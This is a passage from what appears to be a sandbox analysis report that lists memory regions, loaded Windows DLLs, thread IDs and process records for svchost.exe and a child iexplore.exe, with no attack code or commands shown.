id = 703 start_va = 0x3070000 end_va = 0x3070fff entry_point = 0x0 region_type = private name = "private_0x0000000003070000" filename = "" Region: id = 704 start_va = 0x3080000 end_va = 0x308ffff entry_point = 0x0 region_type = private name = "private_0x0000000003080000" filename = "" Region: id = 705 start_va = 0x3090000 end_va = 0x309ffff entry_point = 0x0 region_type = private name = "private_0x0000000003090000" filename = "" Region: id = 706 start_va = 0x32a0000 end_va = 0x32affff entry_point = 0x0 region_type = private name = "private_0x00000000032a0000" filename = "" Region: id = 707 start_va = 0x32b0000 end_va = 0x32bffff entry_point = 0x0 region_type = private name = "private_0x00000000032b0000" filename = "" Region: id = 708 start_va = 0x32c0000 end_va = 0x32cffff entry_point = 0x0 region_type = private name = "private_0x00000000032c0000" filename = "" Region: id = 709 start_va = 0x32d0000 end_va = 0x32dffff entry_point = 0x0 region_type = private name = "private_0x00000000032d0000" filename = "" Region: id = 710 start_va = 0x32e0000 end_va = 0x32effff entry_point = 0x0 region_type = private name = "private_0x00000000032e0000" filename = "" Region: id = 711 start_va = 0x32f0000 end_va = 0x32fffff entry_point = 0x0 region_type = private name = "private_0x00000000032f0000" filename = "" Region: id = 712 start_va = 0x3300000 end_va = 0x330ffff entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 713 start_va = 0x3310000 end_va = 0x331ffff entry_point = 0x0 region_type = private name = "private_0x0000000003310000" filename = "" Region: id = 714 start_va = 0x3320000 end_va = 0x332ffff entry_point = 0x0 region_type = private name = "private_0x0000000003320000" filename = "" Region: id = 715 start_va = 0x3330000 end_va = 0x333ffff entry_point = 0x0 region_type = private name = "private_0x0000000003330000" filename = "" Region: id = 716 start_va = 0x4030000 end_va = 0x403ffff entry_point = 0x0 region_type = private name = "private_0x0000000004030000" filename = "" Region: id = 717 start_va = 0x705e0000 end_va = 0x705e8fff entry_point = 0x705e0000 region_type = mapped_file name = "cscdll.dll" filename = "\\Windows\\System32\\cscdll.dll" (normalized: "c:\\windows\\system32\\cscdll.dll") Region: id = 718 start_va = 0x705f0000 end_va = 0x70659fff entry_point = 0x705f0000 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll") Region: id = 719 start_va = 0x70660000 end_va = 0x70ec3fff entry_point = 0x70660000 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\PROGRA~1\\MICROS~1\\Office14\\1033\\GrooveIntlResource.dll" (normalized: "c:\\progra~1\\micros~1\\office14\\1033\\grooveintlresource.dll") Region: id = 720 start_va = 0x70ed0000 end_va = 0x712e9fff entry_point = 0x70ed0000 region_type = mapped_file name = "office.odf" filename = "\\PROGRA~1\\COMMON~1\\MICROS~1\\OFFICE14\\Cultures\\OFFICE.ODF" (normalized: "c:\\progra~1\\common~1\\micros~1\\office14\\cultures\\office.odf") Region: id = 721 start_va = 0x3340000 end_va = 0x3341fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003340000" filename = "" Region: id = 722 start_va = 0x705d0000 end_va = 0x705dafff entry_point = 0x705d0000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 723 start_va = 0x70560000 end_va = 0x705cffff entry_point = 0x70560000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 724 start_va = 0x75220000 end_va = 0x75238fff entry_point = 0x75220000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 725 start_va = 0x73870000 end_va = 0x73879fff entry_point = 0x73870000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 726 start_va = 0x2f60000 end_va = 0x2f60fff entry_point = 0x0 region_type = private name = "private_0x0000000002f60000" filename = "" Region: id = 727 start_va = 0x2fb0000 end_va = 0x2fc1fff entry_point = 0x0 region_type = private name = "private_0x0000000002fb0000" filename = "" Region: id = 728 start_va = 0x2fd0000 end_va = 0x2fe1fff entry_point = 0x0 region_type = private name = "private_0x0000000002fd0000" filename = "" Region: id = 729 start_va = 0x3cc0000 end_va = 0x3d07fff entry_point = 0x0 region_type = private name = "private_0x0000000003cc0000" filename = "" Region: id = 730 start_va = 0x3d10000 end_va = 0x3d57fff entry_point = 0x0 region_type = private name = "private_0x0000000003d10000" filename = "" Region: id = 731 start_va = 0x6dd30000 end_va = 0x6dd5dfff entry_point = 0x6dd30000 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 827 start_va = 0x752e0000 end_va = 0x7533efff entry_point = 0x752e0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 828 start_va = 0x77370000 end_va = 0x77372fff entry_point = 0x77370000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Thread: id = 6 os_tid = 0xbe0 Thread: id = 7 os_tid = 0xc0c Thread: id = 8 os_tid = 0xc10 Thread: id = 9 os_tid = 0xc14 Thread: id = 10 os_tid = 0xc18 Thread: id = 11 os_tid = 0xc1c Thread: id = 24 os_tid = 0xc20 Thread: id = 25 os_tid = 0xc24 Thread: id = 26 os_tid = 0xc28 Thread: id = 27 os_tid = 0xc2c Thread: id = 28 os_tid = 0xc30 Thread: id = 29 os_tid = 0xc34 Thread: id = 30 os_tid = 0xc38 Thread: id = 31 os_tid = 0xc3c Thread: id = 41 os_tid = 0xc6c Thread: id = 80 os_tid = 0xc88 Thread: id = 83 os_tid = 0xca0 Thread: id = 85 os_tid = 0xd9c Process: id = "3" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7ea16200" os_pid = "0x3e8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0xbdc" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000c2d0" [0xc000000f], "LOCAL" [0x7] Region: id = 318 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 319 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 320 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 321 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 322 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 323 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 324 start_va = 0x100000 end_va = 0x101fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 325 start_va = 0x110000 end_va = 0x117fff entry_point = 0x110000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 326 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 327 start_va = 0x130000 end_va = 0x130fff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 328 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 329 start_va = 0x170000 end_va = 0x171fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 330 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 331 start_va = 0x190000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 332 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 333 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 334 start_va = 0x2d0000 end_va = 0x397fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 335 start_va = 0x3a0000 end_va = 0x4a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 336 start_va = 0x4b0000 end_va = 0x52ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 337 start_va = 0x530000 end_va = 0x922fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 338 start_va = 0x990000 end_va = 0x9cffff entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 339 start_va = 0x9d0000 end_va = 0xa0ffff entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 340 start_va = 0xa70000 end_va = 0xaaffff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 341 start_va = 0xb70000 end_va = 0xbaffff entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 342 start_va = 0xbf0000 end_va = 0xc2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 343 start_va = 0xc30000 end_va = 0xefefff entry_point = 0xc30000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 344 start_va = 0xf00000 end_va = 0xf7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 345 start_va = 0x1010000 end_va = 0x104ffff entry_point = 0x0 region_type = private name = "private_0x0000000001010000" filename = "" Region: id = 346 start_va = 0x1070000 end_va = 0x10affff entry_point = 0x0 region_type = private name = "private_0x0000000001070000" filename = "" Region: id = 347 start_va = 0x10c0000 end_va = 0x10fffff entry_point = 0x0 region_type = private name = "private_0x00000000010c0000" filename = "" Region: id = 348 start_va = 0x1120000 end_va = 0x115ffff entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 349 start_va = 0x11a0000 end_va = 0x11affff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 350 start_va = 0x11b0000 end_va = 0x12affff entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 351 start_va = 0x12b0000 end_va = 0x13affff entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 352 start_va = 0x13f0000 end_va = 0x13fffff entry_point = 0x0 region_type = private name = "private_0x00000000013f0000" filename = "" Region: id = 353 start_va = 0x1400000 end_va = 0x14bffff entry_point = 0x1400000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 354 start_va = 0x14f0000 end_va = 0x152ffff entry_point = 0x0 region_type = private name = "private_0x00000000014f0000" filename = "" Region: id = 355 start_va = 0x15e0000 end_va = 0x15effff entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 356 start_va = 0x16c0000 end_va = 0x16fffff entry_point = 0x0 region_type = private name = "private_0x00000000016c0000" filename = "" Region: id = 357 start_va = 0x1730000 end_va = 0x176ffff entry_point = 0x0 region_type = private name = "private_0x0000000001730000" filename = "" Region: id = 358 start_va = 0x17a0000 end_va = 0x17dffff entry_point = 0x0 region_type = private name = "private_0x00000000017a0000" filename = "" Region: id = 359 start_va = 0x6e5a0000 end_va = 0x6e5acfff entry_point = 0x6e5a0000 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 360 start_va = 0x6e5b0000 end_va = 0x6e5b2fff entry_point = 0x6e5b0000 region_type = mapped_file name = "sfc.dll" filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll") Region: id = 361 start_va = 0x6e5c0000 end_va = 0x6e5d1fff entry_point = 0x6e5c0000 region_type = mapped_file name = "aepic.dll" filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll") Region: id = 362 start_va = 0x6e5e0000 end_va = 0x6e66ffff entry_point = 0x6e5e0000 region_type = mapped_file name = "perftrack.dll" filename = "\\Windows\\System32\\perftrack.dll" (normalized: "c:\\windows\\system32\\perftrack.dll") Region: id = 363 start_va = 0x6e700000 end_va = 0x6e707fff entry_point = 0x6e700000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 364 start_va = 0x6e8a0000 end_va = 0x6e8f9fff entry_point = 0x6e8a0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 365 start_va = 0x6f290000 end_va = 0x6f2f0fff entry_point = 0x6f290000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 366 start_va = 0x6fcf0000 end_va = 0x6fd3efff entry_point = 0x6fcf0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 367 start_va = 0x6fd40000 end_va = 0x6fd97fff entry_point = 0x6fd40000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 368 start_va = 0x6fff0000 end_va = 0x70004fff entry_point = 0x6fff0000 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 369 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 370 start_va = 0x718b0000 end_va = 0x718fbfff entry_point = 0x718b0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 371 start_va = 0x71f60000 end_va = 0x71f67fff entry_point = 0x71f60000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 372 start_va = 0x71f70000 end_va = 0x71f81fff entry_point = 0x71f70000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 373 start_va = 0x733c0000 end_va = 0x733cffff entry_point = 0x733c0000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 374 start_va = 0x73670000 end_va = 0x73681fff entry_point = 0x73670000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 375 start_va = 0x73690000 end_va = 0x7369cfff entry_point = 0x73690000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 376 start_va = 0x736b0000 end_va = 0x736e7fff entry_point = 0x736b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 377 start_va = 0x737a0000 end_va = 0x737a7fff entry_point = 0x737a0000 region_type = mapped_file name = "nsisvc.dll" filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll") Region: id = 378 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 379 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 380 start_va = 0x73820000 end_va = 0x73866fff entry_point = 0x73820000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 381 start_va = 0x73880000 end_va = 0x73888fff entry_point = 0x73880000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 382 start_va = 0x738f0000 end_va = 0x738fffff entry_point = 0x738f0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 383 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 384 start_va = 0x748d0000 end_va = 0x748d8fff entry_point = 0x748d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 385 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 386 start_va = 0x74a10000 end_va = 0x74a25fff entry_point = 0x74a10000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 387 start_va = 0x74a30000 end_va = 0x74a46fff entry_point = 0x74a30000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 388 start_va = 0x74b20000 end_va = 0x74b27fff entry_point = 0x74b20000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 389 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 390 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 391 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 392 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 393 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 394 start_va = 0x75290000 end_va = 0x75297fff entry_point = 0x75290000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 395 start_va = 0x752b0000 end_va = 0x752cafff entry_point = 0x752b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 396 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 397 start_va = 0x752e0000 end_va = 0x7533efff entry_point = 0x752e0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 398 start_va = 0x75370000 end_va = 0x7537dfff entry_point = 0x75370000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 399 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 400 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 401 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 402 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 403 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 404 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 405 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 406 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 407 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 408 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 409 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 410 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 411 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 412 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 413 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 414 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 415 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 416 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 417 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 418 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 419 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 420 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 421 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 422 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 423 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 424 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 425 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 426 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 427 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 428 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 429 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 430 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 431 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 432 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 433 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Thread: id = 12 os_tid = 0x9a0 Thread: id = 13 os_tid = 0x6d4 Thread: id = 14 os_tid = 0x248 Thread: id = 15 os_tid = 0x244 Thread: id = 16 os_tid = 0x124 Thread: id = 17 os_tid = 0x144 Thread: id = 18 os_tid = 0x7bc Thread: id = 19 os_tid = 0x7a8 Thread: id = 20 os_tid = 0x7a4 Thread: id = 21 os_tid = 0x414 Thread: id = 22 os_tid = 0x400 Thread: id = 23 os_tid = 0x3ec Thread: id = 82 os_tid = 0xc90 Thread: id = 84 os_tid = 0xd98 Process: id = "4" image_name = "iexplore.exe" filename = "c:\\program files\\internet explorer\\iexplore.exe" page_root = "0x7ea16700" os_pid = "0xc44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" 